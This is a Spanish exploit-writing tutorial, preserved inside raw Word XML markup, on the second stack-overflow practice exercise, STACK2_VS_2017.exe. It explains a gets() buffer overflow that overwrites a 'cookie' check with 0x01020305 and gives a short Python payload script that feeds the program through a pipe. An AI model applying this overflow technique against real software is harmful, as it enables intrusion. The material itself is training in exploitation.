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Ahora que ya resolvimos el primer ejercicio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01 Stack Nro 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> podemos pasar a este segundo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STACK2_VS_2017</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe.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Como en el anterior al inicio de la función se reservan 0x54 (84) bytes para ser usados por las variables locales, etc.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49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También hay un MessageBox al que debemos aceptar y se imprime un mensaje de ayuda con las direcciones del </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1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y de la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie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Luego se le pasa como argumento un puntero al comienzo de la variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var_54</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gets. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vamos a renombrar a esta variable como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">me paro arriba y presionas la tecla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y le cambiamos el nombre.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3105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Lo único que cambia aquí es el valor contra la que se compara la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, ahora es un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x01020305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 script en python quedaria asi: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subprocess import Popen, PIPE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buffer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b"A"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cookie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b"\x05\x03\x02\x01"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payload = buffer + cookie</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1 = Popen(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"STACK2_VS_2017.exe"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stdin=PIPE)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"PID: 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% hex(p1.pid))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para continuar"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p1.communicate(payload)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1.wait()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">input()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53000" cy="1257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El siguiente ejercicio es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03 Stack Nro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f4_MbTtzIt03H4hTP_0T-LWgD44xoxzf70-OgCmvWz8/edit?usp=sharing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28WppAv2U55NWb4uhFO55tlA0ORz4FjiG1deznUwkI/edit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